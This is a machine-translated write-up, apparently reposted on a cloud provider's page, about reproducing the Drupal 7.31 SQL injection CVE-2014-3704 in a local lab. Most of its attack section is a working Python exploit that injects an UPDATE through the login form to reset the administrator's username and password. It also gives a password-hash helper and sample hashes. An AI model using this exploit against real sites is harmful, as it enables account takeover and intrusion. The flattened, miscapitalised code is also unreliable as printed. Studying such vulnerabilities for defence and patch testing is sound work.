[cve-2014-3704] Drupal 7.31 SQL Injection Vulnerability Analysis and replication

Source: Internet
Author: User
Tags ord rehash drupal cve

is not a very new loophole, the record of their own replication thinking vulnerability impact:

Drupal 7.31

Drupal is an open source content management platform that provides support for millions of of websites and applications.

It is built, used and supported by an active and diverse community around the world.

0x01 Vulnerability Reappearance

Reproduce the Environment:

1) Apache2.4

2) PHP 7.0

3) Drupal 7.31 https://www.drupal.org/drupal-7.31-release-notes( Click to download )

Environment packaging in the directory installation can

Problems encountered in the middle:

workaround: Turn off extersion=php_mbstring.dll (note back up before modifying the original)

Exploit:

  

Original administrator account: root password: rootxxxx

Import urllib2,sysfrom drupalpass Import Drupalhash host = Sys.argv[1]user = Sys.argv[2]password = Sys.argv[3]if Len (sys.a RGV)! = 3:print "host username password" print "Http://nope.io admin wowsecure" hash = Drupalhash ("$S $CTO9G7LX28RZCF Pn4wb2hulkndkv6qtqhaf82wlbhpt2k5tzkzml ", password). Get_hash () target = '%s/?q=node&destination=node '% hostpost_             data = "Name[0%20;update+users+set+name%3d\" "+user +" ' +,+pass+%3d+ ' "+hash[:55] + "' +where+uid+%3d+\ ' 1\ ';; #%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=log+in " Content = Urllib2.urlopen (Url=target, Data=post_data). Read () if "Mb_strlen () expects parameter 1" in Content:print "Success!\nlogin now with user:%s and pass:%s"% (user, password) import hashlib# Calculate a non-truncated Drupal 7 compat ible Password hash.# The consumer of these hashes must truncate Correctly.class drupalhash:def __init__ (self, Stored_has  h, password):  Self.itoa64 = './0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz ' Self.last_hash = Self.rehash ( Stored_hash, password) def get_hash (self): return Self.last_hash def password_get_count_log2 (self, setting): Retur N Self.itoa64.index (setting[3]) def password_crypt (self, algo, password, setting): setting = Setting[0:12] If Setti NG[0]! = ' $ ' or setting[2]! = ' $ ': return False count_log2 = self.password_get_count_log2 (setting) Salt = Setti Ng[4:12] If Len (salt) < 8:return False count = 1 << count_log2 If algo = = ' MD5 ': Hash_func = Hashlib.md5 elif Algo = = ' sha512 ': Hash_func = hashlib.sha512 else:return False hash_str = Hash_func (s ALT + password). Digest () for C in range (count): Hash_str = hash_func (hash_str + password). Digest () output = set Ting + self.custom64 (hash_str) return output def custom64 (self, string, Count = 0): if count = = 0:count = Len (string) output = ' I =0 itoa64 = self.itoa64 while 1:value = Ord (String[i]) i + = 1 output + = Itoa64[value & 0x3f]  If I < Count:value |= Ord (String[i]) << 8 output + = itoa64[(value >> 6) & 0x3f] if I >= Count:break i + = 1 if i < Count:value |= Ord (string[i]) << output + = Ito a64[(Value >>) & 0x3f] If I >= count:break i + = 1 output + = itoa64[(value >>  ) & 0x3f] If I >= count:break return output def rehash (self, Stored_hash, password): # Drupal 6 compatibility If Len (stored_hash) = = + Stored_hash.find (' $ ') = = -1:return hashlib.md5 (password). hexdigest () # Drupal 7 if stored_hash[0:2] = = ' u$ ': Stored_hash = stored_hash[1:] Password = hashlib.md5 (password ). Hexdigest () Hash_type = Stored_hash[0:3] if Hash_type = = ' $S $ ': hash_str = Self.password_crypt (' sha512 ', pass Word, Stored_hash) elif Hash_type = = ' $H $ ' or hash_type = = ' $P $ ': hash_str = self.password_crypt (' MD5 ', password, stored_hash) Else: Hash_str = False return hash_str

I'm not compiling here.

Http://127.0.0.1/drupal-7.31/node?destination=node

Click Login here to post to modify the query statement, insert the UPDATE SQL statement directly change the Administrator account password.

Here's the encrypted way to call the official password-hash.sh to generate their own hash

Here's an error.

found two online public hash to update .

$S $DKIKDKLIVRK0IVHM99X7B/M8QC17E1TP/KMOD1IE8V/PGWJTAZLD---->thanks

$S $CTO9G7LX2MJRSYWMLH3NRTXL6AWJT35FZEP9OBYJKWEZMHOGQF.S--->[email protected]

Payload:

  

Direct Update User: Owned password: [email protected]

from the database query back results or MySQL monitoring can be seen, the administrator's user name and password are reset. owned user is promoted to administrator, and password is set to [email protected].

Ref

    • http://0day5.com/archives/2310/
    • Http://www.freebuf.com/vuls/47690.html

[cve-2014-3704] Drupal 7.31 SQL Injection Vulnerability Analysis and replication

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.